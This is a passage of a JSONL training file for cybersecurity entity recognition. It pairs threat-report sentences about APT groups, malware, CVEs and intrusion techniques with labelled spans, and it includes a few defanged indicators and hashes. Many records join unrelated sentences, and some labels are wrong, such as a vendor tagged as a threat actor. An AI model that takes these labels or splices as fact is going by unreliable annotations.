The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 .", "spans": {"MALWARE: Okrum": [[52, 57]], "VULNERABILITY: exploit": [[276, 283]], "FILEPATH: ITW": [[284, 287]], "TOOL: (VirusTotal": [[400, 411]], "TOOL: RTF": [[447, 450]]}, "info": {"id": "cyberner_stix_train_004996", "source": "cyberner_stix_train"}} {"text": "For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke , that were purposely designed to leave a persistent backdoor on the compromised network .", "spans": {"MALWARE: CozyDuke": [[10, 18]], "THREAT_ACTOR: Dukes": [[43, 48]], "MALWARE: SeaDuke": [[111, 118]], "MALWARE: HammerDuke": [[123, 133]]}, "info": {"id": "cyberner_stix_train_004997", "source": "cyberner_stix_train"}} {"text": "In this case , we had observed the Sofacy group registering new domains , then placing a default landing page which they then used repeatedly over the course of the year .", "spans": {"THREAT_ACTOR: Sofacy": [[35, 41]]}, "info": {"id": "cyberner_stix_train_004999", "source": "cyberner_stix_train"}} {"text": "The version we found was built at the beginning of 2017 , and at the moment we are not sure whether this implant has been used in the wild . Trend Micro™ Deep Discovery™ provides detection , in-depth analysis , and proactive response to today’s stealthy malware , and targeted attacks in real time . 
One of the alleged leaders was arrested in Spain in early 2018 , but the group still appears to be active .", "spans": {"ORGANIZATION: Trend Micro™": [[141, 153]], "THREAT_ACTOR: attacks": [[277, 284]]}, "info": {"id": "cyberner_stix_train_005000", "source": "cyberner_stix_train"}} {"text": "Despite the shared history of the name itself however , it is important to note that there is no reason to believe that the Duke toolsets themselves are in any way related to the ItaDuke malware , or to Duqu for that matter .", "spans": {"THREAT_ACTOR: Duke": [[124, 128]], "MALWARE: ItaDuke": [[179, 186]], "MALWARE: Duqu": [[203, 207]]}, "info": {"id": "cyberner_stix_train_005001", "source": "cyberner_stix_train"}} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . It's unclear how Cadelle infects its targets with Backdoor.Cadelspy .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: specific individuals": [[82, 102]], "VULNERABILITY: zero-day exploits": [[143, 160]], "MALWARE: Backdoor.Cadelspy": [[252, 269]]}, "info": {"id": "cyberner_stix_train_005002", "source": "cyberner_stix_train"}} {"text": "It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . 
XENOTIME is easily the most dangerous threat activity publicly known .", "spans": {"THREAT_ACTOR: attackers": [[56, 65]], "TOOL: Naikon proxies": [[73, 87]], "THREAT_ACTOR: XENOTIME": [[236, 244]]}, "info": {"id": "cyberner_stix_train_005003", "source": "cyberner_stix_train"}} {"text": "Ensure error messages are generic and do not expose too much information .", "spans": {}, "info": {"id": "cyberner_stix_train_005004", "source": "cyberner_stix_train"}} {"text": "Use of malware that is capable of spying on infected systems .", "spans": {}, "info": {"id": "cyberner_stix_train_005005", "source": "cyberner_stix_train"}} {"text": "Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"MALWARE: Previous versions": [[0, 17]], "ORGANIZATION: Kaspersky": [[36, 45]], "THREAT_ACTOR: Cylance": [[58, 65]], "ORGANIZATION: Trend Micro": [[90, 101]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[135, 154]]}, "info": {"id": "cyberner_stix_train_005006", "source": "cyberner_stix_train"}} {"text": "The stolen data includes : Contacts ( stored both on the phone and the SIM card ) . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . 
NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird .", "spans": {"THREAT_ACTOR: APT34": [[113, 118]], "VULNERABILITY: CVE-2017-0199": [[209, 222]], "VULNERABILITY: CVE-2017-11882": [[227, 241]], "THREAT_ACTOR: NEODYMIUM": [[289, 298]], "ORGANIZATION: Microsoft": [[372, 381]], "MALWARE: Wingbird": [[385, 393]]}, "info": {"id": "cyberner_stix_train_005007", "source": "cyberner_stix_train"}} {"text": "'' As was the case with HummingBad , the purpose of HummingWhale is to generate revenue by displaying fraudulent ads and automatically installing apps . These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . Custom malware used by the group include : Two threat clusters used Mimikatz for dumping process memory .", "spans": {"MALWARE: HummingBad": [[24, 34]], "MALWARE: HummingWhale": [[52, 64]], "TOOL: Mimikatz": [[428, 436]]}, "info": {"id": "cyberner_stix_train_005008", "source": "cyberner_stix_train"}} {"text": "On September 19 , 2019 , we observed the same exact Mimikatz variant uploaded to a webshell hosted at another government organization in a second country in the Middle East .", "spans": {"TOOL: Mimikatz": [[52, 60]]}, "info": {"id": "cyberner_stix_train_005009", "source": "cyberner_stix_train"}} {"text": "We also provide an update on shifts in the group ’s tool development and use , and summarize the tactics APT28 employs to compromise its victims .", "spans": {"THREAT_ACTOR: APT28": [[105, 110]]}, "info": {"id": "cyberner_stix_train_005010", "source": "cyberner_stix_train"}} {"text": "FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT28": [[112, 117]]}, "info": {"id": "cyberner_stix_train_005011", "source": 
"cyberner_stix_train"}} {"text": "We believe the creator of this delivery document chose to run the payload from the dropped file as an evasion technique .", "spans": {}, "info": {"id": "cyberner_stix_train_005012", "source": "cyberner_stix_train"}} {"text": "Hide Icon Figure 3 : Code showing the hiding icon and starting service . The Buckeye attack group was using Equation Group tools to gain persistent access to target organizations at least a year prior to the Shadow Brokers leak . The threat actors utilizing this toolset have repeatedly demonstrated their expertise in compromising Windows based environments .", "spans": {"THREAT_ACTOR: Buckeye": [[77, 84]], "TOOL: Equation Group tools": [[108, 128]], "SYSTEM: Windows": [[332, 339]]}, "info": {"id": "cyberner_stix_train_005013", "source": "cyberner_stix_train"}} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: chemical makers": [[78, 93]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "VULNERABILITY: exploit": [[311, 318]], "VULNERABILITY: kit Niteris": [[319, 330]], "MALWARE: Corkow": [[346, 352]]}, "info": {"id": "cyberner_stix_train_005014", "source": "cyberner_stix_train"}} {"text": "When enabled , it makes a screenshot every 25 seconds nggstart_key nggstop_key Enable/disable keylogging module nggstart_rec nggstop_rec Enable/disable surrounding sounds recording module ngg_status Send components status to the C & C socket * any other * Execute received command via Python ’ s subprocess.Popen ( ) , output result will be sent to the C & C socket . After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . The group is made up of actors who likely speak Russian .", "spans": {"SYSTEM: Python": [[285, 291]], "MALWARE: SWAnalytics": [[402, 413]]}, "info": {"id": "cyberner_stix_train_005015", "source": "cyberner_stix_train"}} {"text": "In our Revoke-Obfuscation white paper , first presented at Black Hat USA 2017 , we provide background on obfuscated PowerShell attacks seen in the wild , as well as defensive mitigation and logging best practices . 
The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"ORGANIZATION: Black Hat": [[59, 68]], "ORGANIZATION: consumer": [[292, 300]], "MALWARE: Carberp": [[392, 399]]}, "info": {"id": "cyberner_stix_train_005016", "source": "cyberner_stix_train"}} {"text": "The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials , allowing the actors to gain access to the targeted network . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: ASA": [[96, 99]], "TOOL: DLL": [[275, 278], [323, 326]], "FILEPATH: ASPNET_FILTER.DLL": [[281, 298]], "FILEPATH: ASP.NET ISAPI Filter": [[335, 355]]}, "info": {"id": "cyberner_stix_train_005017", "source": "cyberner_stix_train"}} {"text": "Trojan.Zekapab is a downloader component that is capable of carrying out basic reconnaissance functions and downloading additional malware to the infected computer .", "spans": {"FILEPATH: Trojan.Zekapab": [[0, 14]]}, "info": {"id": "cyberner_stix_train_005018", "source": "cyberner_stix_train"}} {"text": "Figure 8 – Android requirements Android malware has been around for many years and will be with us for the foreseeable future . While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks . This shows that the actor is still very active and constantly trying to elaborate its attack tools . 
Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"SYSTEM: Android": [[11, 18], [32, 39]], "SYSTEM: Compromised websites": [[384, 404]], "ORGANIZATION: WordPress": [[407, 416]]}, "info": {"id": "cyberner_stix_train_005019", "source": "cyberner_stix_train"}} {"text": "This may imply the “ Concipit1248 ” app is still incubating . The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In this case , When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company ’s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": {"THREAT_ACTOR: GCMAN group": [[66, 77]], "ORGANIZATION: bank": [[144, 148]], "ORGANIZATION: AshleyMadison.com": [[290, 307]], "ORGANIZATION: Noel Biderman": [[432, 445]], "ORGANIZATION: unnamed former contractor": [[482, 507]]}, "info": {"id": "cyberner_stix_train_005020", "source": "cyberner_stix_train"}} {"text": "This is a form of anti-analysis as Word will not fully execute the malicious code until the user closes the document .", "spans": {"TOOL: Word": [[35, 39]]}, "info": {"id": "cyberner_stix_train_005021", "source": "cyberner_stix_train"}} {"text": "We warned our clients of new features suggesting an increased focus on European targets - though verification of targets was not possible at the time . 
We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"THREAT_ACTOR: operators": [[188, 197]], "THREAT_ACTOR: APT28": [[205, 210]], "ORGANIZATION: citizens": [[238, 246], [250, 258]]}, "info": {"id": "cyberner_stix_train_005022", "source": "cyberner_stix_train"}} {"text": "The command then uses the certutil application to convert the base64 encoded data ( T1132 ) in the cmd.txt file to c.aspx in three different SharePoint related folders .", "spans": {"FILEPATH: cmd.txt": [[99, 106]], "FILEPATH: c.aspx": [[115, 121]], "TOOL: SharePoint": [[141, 151]]}, "info": {"id": "cyberner_stix_train_005023", "source": "cyberner_stix_train"}} {"text": "Traces of its previous uses in the wild were found inside the configuration file : It was configured to use a Command-and-control ( C & C ) server in the United States ; however , the server was bought from a host service provider and is now unavailable . Carbanak is a backdoor used by the attackers to compromise the victim . The original code is separated into the orange-colored “ first block ” An internal data defense strategy requires prevention , detection and response capabilities .", "spans": {"MALWARE: Carbanak": [[256, 264]], "TOOL: backdoor": [[270, 278]], "THREAT_ACTOR: attackers": [[291, 300]]}, "info": {"id": "cyberner_stix_train_005024", "source": "cyberner_stix_train"}} {"text": "Following we can see an example of a connection to port 6209 which is used to extract data from the Telegram app . Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks . Contains the above mentioned document , as well as photos of the assemblies and political cartoons criticizing Hamas 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b . 
Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": {"SYSTEM: Telegram": [[100, 108]], "THREAT_ACTOR: Blackfly": [[115, 123]], "FILEPATH: 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b": [[352, 416]], "TOOL: Cisco Duo": [[419, 428]]}, "info": {"id": "cyberner_stix_train_005025", "source": "cyberner_stix_train"}} {"text": "Always apply critical thinking and consider whether you should give a certain app the permissions it requests . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well .", "spans": {"MALWARE: ASPNET_FILTER.DLL": [[204, 221]], "MALWARE: ASP.NET ISAPI Filter": [[258, 278]], "THREAT_ACTOR: actor": [[303, 308]], "VULNERABILITY: CVE-2012-0158": [[348, 361]], "THREAT_ACTOR: Spring Dragon": [[385, 398]]}, "info": {"id": "cyberner_stix_train_005026", "source": "cyberner_stix_train"}} {"text": "Due to new EU money laundering guidelines , the new Bank Austria security app is mandatory for all customers who have a mobile phone number in our system . This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa) . 
Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005 .", "spans": {"ORGANIZATION: EU": [[11, 13]], "SYSTEM: Bank Austria security app": [[52, 77]], "THREAT_ACTOR: attackers": [[185, 194]], "THREAT_ACTOR: Poseidon Group": [[292, 306]]}, "info": {"id": "cyberner_stix_train_005027", "source": "cyberner_stix_train"}} {"text": "Once inside the network of a hospitality company , APT28 sought out machines that controlled both guest and internal Wi-Fi networks .", "spans": {"THREAT_ACTOR: APT28": [[51, 56]], "TOOL: Wi-Fi networks": [[117, 131]]}, "info": {"id": "cyberner_stix_train_005028", "source": "cyberner_stix_train"}} {"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Some examples of the files used in the email attachment include the following :", "spans": {"MALWARE: China Chopper": [[0, 13]], "THREAT_ACTOR: attackers": [[36, 45]], "TOOL: email": [[213, 218]]}, "info": {"id": "cyberner_stix_train_005029", "source": "cyberner_stix_train"}} {"text": "This infamous RAT has been associated with many different Chinese threat actors , including APT10 , APT1 , and DragonOK . 
For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"TOOL: RAT": [[14, 17]], "THREAT_ACTOR: threat actors": [[66, 79]], "THREAT_ACTOR: APT10": [[92, 97]], "THREAT_ACTOR: APT1": [[100, 104]], "THREAT_ACTOR: DragonOK": [[111, 119]], "MALWARE: FrozenCell": [[154, 164]], "MALWARE: Tawjihi 2016": [[191, 203]], "ORGANIZATION: students": [[237, 245]]}, "info": {"id": "cyberner_stix_train_005030", "source": "cyberner_stix_train"}} {"text": "One might argue that since this took place after the exploits were publicly mentioned , the Dukes simply copied them .", "spans": {"THREAT_ACTOR: Dukes": [[92, 97]]}, "info": {"id": "cyberner_stix_train_005031", "source": "cyberner_stix_train"}} {"text": "de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . The complex infection chain begins with a weaponized Office document named “ f.doc ” . 
Schools , colleges , and universities must somehow reconcile tight budgets with the need to deploy a sophisticated enough detection and response capability to find and evict stealthy adversaries like Vice Society .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[355, 365]], "THREAT_ACTOR: NEODYMIUM": [[370, 379]], "VULNERABILITY: CVE-2016-4117": [[405, 418]], "TOOL: Office": [[566, 571]], "FILEPATH: f.doc": [[589, 594]], "ORGANIZATION: Schools": [[599, 606]], "ORGANIZATION: colleges": [[609, 617]], "ORGANIZATION: universities": [[624, 636]], "THREAT_ACTOR: Vice Society": [[799, 811]]}, "info": {"id": "cyberner_stix_train_005032", "source": "cyberner_stix_train"}} {"text": "Upon creation the class will start to take screenshots that will be stopped and uploaded to the C2 once the service ca n't find the targeted applications running . they have been last known to employ malware in February 2016 . Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28 . APT29 has also used legitimate web services such as Dropbox and Constant Contact in their operations .", "spans": {"MALWARE: HIGHTIDE": [[246, 254]], "THREAT_ACTOR: APT12": [[273, 278]], "ORGANIZATION: Taiwanese Government": [[297, 317]], "THREAT_ACTOR: APT29": [[359, 364]]}, "info": {"id": "cyberner_stix_train_005033", "source": "cyberner_stix_train"}} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . 
Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[40, 57]], "MALWARE: Microsoft Office Word document": [[86, 116]], "VULNERABILITY: CVE-2012-0158": [[159, 172]], "ORGANIZATION: satellite communications operator": [[251, 284]]}, "info": {"id": "cyberner_stix_train_005034", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HttpBrowser or PlugX .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: ASPXTool": [[51, 59]], "TOOL: web shells": [[60, 70]], "TOOL: web shell": [[151, 160]], "MALWARE: HttpBrowser": [[173, 184]], "MALWARE: PlugX": [[188, 193]]}, "info": {"id": "cyberner_stix_train_005035", "source": "cyberner_stix_train"}} {"text": "Later , they were also associated with botnet IDs 7200 and 7500 .", "spans": {}, "info": {"id": "cyberner_stix_train_005036", "source": "cyberner_stix_train"}} {"text": "Dropping Cluster Bombs RCSAndroid is a threat that works like a cluster bomb in that it deploys multiple dangerous exploits and uses various techniques to easily infect Android devices . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa . The value of the variable is assigned to a specific register in each block then compared in a control flow dispatcher and other condition blocks . 
The initial payloads and second stage backdoors were removed from the system .", "spans": {"MALWARE: RCSAndroid": [[23, 33]], "SYSTEM: Android": [[169, 176]], "VULNERABILITY: Carbanak": [[225, 233]], "THREAT_ACTOR: attackers": [[234, 243]]}, "info": {"id": "cyberner_stix_train_005037", "source": "cyberner_stix_train"}} {"text": "That finally started to change in 2013 .", "spans": {}, "info": {"id": "cyberner_stix_train_005038", "source": "cyberner_stix_train"}} {"text": "HammerDuke is a set of backdoors that was first seen in the wild in February 2015 , while SeaDuke is a crossplatform backdoor that was , according to Symantec , first spotted in the wild in October 2014 .", "spans": {"MALWARE: HammerDuke": [[0, 10]], "MALWARE: SeaDuke": [[90, 97]], "ORGANIZATION: Symantec": [[150, 158]]}, "info": {"id": "cyberner_stix_train_005039", "source": "cyberner_stix_train"}} {"text": "For now , that is the only way how cybercriminals can profit from Triada , but don ’ t forget that it ’ s a modular Trojan , so it can be turned into literally everything on one command from the C & C server . Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 
14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"MALWARE: Triada": [[66, 72]], "VULNERABILITY: Flash exploits": [[221, 235]], "VULNERABILITY: Java zero-day": [[305, 318]], "ORGANIZATION: Kaspersky Lab": [[378, 391]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[404, 432]], "ORGANIZATION: Microsoft": [[458, 467]], "VULNERABILITY: CVE-2017-11882": [[487, 501]], "ORGANIZATION: FireEye": [[522, 529]], "THREAT_ACTOR: attacker": [[542, 550]], "VULNERABILITY: exploit": [[560, 567]], "TOOL: Microsoft Office": [[576, 592]], "ORGANIZATION: government organization": [[619, 642]]}, "info": {"id": "cyberner_stix_train_005040", "source": "cyberner_stix_train"}} {"text": "They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "MALWARE: Bugat": [[243, 248]], "MALWARE: Feodo": [[255, 260]], "ORGANIZATION: banking": [[263, 270]], "MALWARE: Trojan": [[271, 277]]}, "info": {"id": "cyberner_stix_train_005041", "source": "cyberner_stix_train"}} {"text": "After successful execution , Downeks returns the results to the C2 S-TOOL server .", "spans": {"MALWARE: Downeks": [[29, 36]], "TOOL: C2 S-TOOL server": [[64, 80]]}, "info": {"id": "cyberner_stix_train_005042", "source": "cyberner_stix_train"}} {"text": "Moreover , there is a special handler for the accelerometer that is able to calculate and log the device ’ s speed : This feature is used in particular by the command “ tk0 ” that mutes the device , disables keyguard , turns off the brightness , uses wakelock and listens to device sensors . 
In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system . APT33 : ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos . Neither France or Germany have been spared by the growing menace of ransomware , either .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[337, 349]], "TOOL: Bankshot malware": [[353, 369]], "THREAT_ACTOR: APT33": [[422, 427]], "MALWARE: ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos": [[430, 508]], "MALWARE: ransomware": [[579, 589]]}, "info": {"id": "cyberner_stix_train_005043", "source": "cyberner_stix_train"}} {"text": "A cybersecurity company focusing on protecting industrial control systems .", "spans": {"ORGANIZATION: A cybersecurity company focusing on protecting industrial control systems": [[0, 73]]}, "info": {"id": "cyberner_stix_train_005044", "source": "cyberner_stix_train"}} {"text": "Correlating these bytes to the standard configuration of Poison Ivy , we can observe the following :", "spans": {"VULNERABILITY: Poison Ivy": [[57, 67]]}, "info": {"id": "cyberner_stix_train_005045", "source": "cyberner_stix_train"}} {"text": "Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . 
As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[29, 43]], "ORGANIZATION: engineering firms": [[132, 149]], "ORGANIZATION: shipping": [[152, 160]], "ORGANIZATION: transportation": [[165, 179]], "ORGANIZATION: manufacturing": [[182, 195]], "ORGANIZATION: defense": [[198, 205]], "ORGANIZATION: government offices": [[208, 226]], "ORGANIZATION: research universities": [[233, 254]], "ORGANIZATION: Kurdish activists": [[378, 395]], "THREAT_ACTOR: Flying Kitten actor group": [[440, 465]]}, "info": {"id": "cyberner_stix_train_005046", "source": "cyberner_stix_train"}} {"text": "We were able to identify that 8,929 files had been exfiltrated from compromised devices and that the overwhelming majority of these , 97 percent , were highly likely encrypted images taken using the device camera . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe . It sets the service status to RUNNING and finally calls the ShellMain function of ZxShell . 
This campaign has a multi - stage attack chain that begins with a phishing email delivered to victims impersonating CoinPayments , a legitimate global cryptocurrency payment gateway .", "spans": {"TOOL: Kazuar tool": [[230, 241]], "THREAT_ACTOR: Uroburos": [[304, 312]], "THREAT_ACTOR: Snake": [[317, 322]], "ORGANIZATION: embassies": [[370, 379]], "ORGANIZATION: defense contractors": [[382, 401]], "ORGANIZATION: educational institutions": [[404, 428]], "ORGANIZATION: research organizations": [[435, 457]], "MALWARE: ZxShell": [[559, 566]]}, "info": {"id": "cyberner_stix_train_005047", "source": "cyberner_stix_train"}} {"text": "Some of the apps we discovered resided on Google Play for several years , but all were recently updated . We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing . The thread KeyloggerThread is spawned and is responsible for doing keylogging on the target workstation . None Use of Python for malware development and/or packaging : We expect to continue to observe attackers compiling or packaging their OT malware via methods such as PyInstaller ( IRONGATE ) or Py2Exe ( TRITON ) given the proliferation of OT malware developed or packaged using Python in recent years .", "spans": {"SYSTEM: Google Play": [[42, 53]], "THREAT_ACTOR: KeyloggerThread": [[308, 323]], "TOOL: Python": [[415, 421], [680, 686]], "THREAT_ACTOR: attackers": [[498, 507]], "MALWARE: OT malware": [[537, 547], [641, 651]], "TOOL: PyInstaller": [[568, 579]], "MALWARE: IRONGATE": [[582, 590]], "TOOL: Py2Exe": [[596, 602]], "MALWARE: TRITON": [[605, 611]]}, "info": {"id": "cyberner_stix_train_005048", "source": "cyberner_stix_train"}} {"text": "They most commonly target Brazilian merchants , though others use the same tactics to exploit entities outside Brazil . 
Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "THREAT_ACTOR: Molerats": [[140, 148]], "ORGANIZATION: governmental": [[157, 169]], "ORGANIZATION: embassies": [[210, 219]], "ORGANIZATION: aerospace": [[241, 250]], "ORGANIZATION: defence Industries": [[255, 273]], "ORGANIZATION: financial institutions": [[276, 298]], "ORGANIZATION: journalists": [[301, 312]], "ORGANIZATION: software developers": [[315, 334]]}, "info": {"id": "cyberner_stix_train_005049", "source": "cyberner_stix_train"}} {"text": "And finally , as every elephant , Babar has big ears and the malware is able to listen to conversations and log them by using the dsound and winmm libraries . It is possible that CVE-2017-8759 was being used by additional actors .", "spans": {"TOOL: Babar": [[34, 39]], "TOOL: dsound": [[130, 136]], "TOOL: winmm libraries": [[141, 156]], "VULNERABILITY: CVE-2017-8759": [[179, 192]], "THREAT_ACTOR: actors": [[222, 228]]}, "info": {"id": "cyberner_stix_train_005050", "source": "cyberner_stix_train"}} {"text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target ’s network .", "spans": {}, "info": {"id": "cyberner_stix_train_005051", "source": "cyberner_stix_train"}} {"text": "From their high volume 0day deployment to their innovative and broad malware set , Sofacy is one of the top groups that we monitor , report , and protect against . 
2017 was not any different in this regard .", "spans": {"VULNERABILITY: 0day": [[23, 27]], "THREAT_ACTOR: Sofacy": [[83, 89]]}, "info": {"id": "cyberner_stix_train_005052", "source": "cyberner_stix_train"}} {"text": "Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” .", "spans": {"THREAT_ACTOR: GCMAN group": [[47, 58]], "ORGANIZATION: bank": [[91, 95]], "FILEPATH: SWAnalytics": [[241, 252]]}, "info": {"id": "cyberner_stix_train_005053", "source": "cyberner_stix_train"}} {"text": "For instance , Russian operators , such as Sandworm Team , have compromised Western ICS over a multi-year period without causing a disruption . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": {"THREAT_ACTOR: Sandworm": [[43, 51]], "MALWARE: Volgmer": [[144, 151]], "TOOL: dynamic-link library": [[220, 240]], "FILEPATH: .dll": [[243, 247]]}, "info": {"id": "cyberner_stix_train_005054", "source": "cyberner_stix_train"}} {"text": "A short , constant string of characters is inserted at strategic points to break up keywords : At runtime , the delimiter is removed before using the string : API OBFUSCATION SMS and toll fraud generally requires a few basic behaviors ( for example , disabling WiFi or accessing SMS ) , which are accessible by a handful of APIs . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government . ZXHttpServer Run a custom HTTP server . 
In the case of the exploit method described here as OWASSRF , the endpoint is not used , in lieu , and the request will not be dropped .", "spans": {"ORGANIZATION: Deepen": [[331, 337]], "ORGANIZATION: China and US relations experts": [[426, 456]], "ORGANIZATION: Defense Department": [[459, 477]], "ORGANIZATION: geospatial groups": [[493, 510]], "ORGANIZATION: federal government": [[522, 540]]}, "info": {"id": "cyberner_stix_train_005055", "source": "cyberner_stix_train"}} {"text": "] comakashipro [ . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . About half of APT1 ’s known zones were named according to three themes : news , technology and business . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": {"TOOL: Infy": [[165, 169]], "THREAT_ACTOR: APT1": [[216, 220]]}, "info": {"id": "cyberner_stix_train_005056", "source": "cyberner_stix_train"}} {"text": "After compromising an initial victim's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim's organization name .", "spans": {"ORGANIZATION: Baidu": [[88, 93]]}, "info": {"id": "cyberner_stix_train_005057", "source": "cyberner_stix_train"}} {"text": "The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint ( previously Microsoft Defender Advanced Threat Protection ) now delivers protection on all major platforms . Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks . 
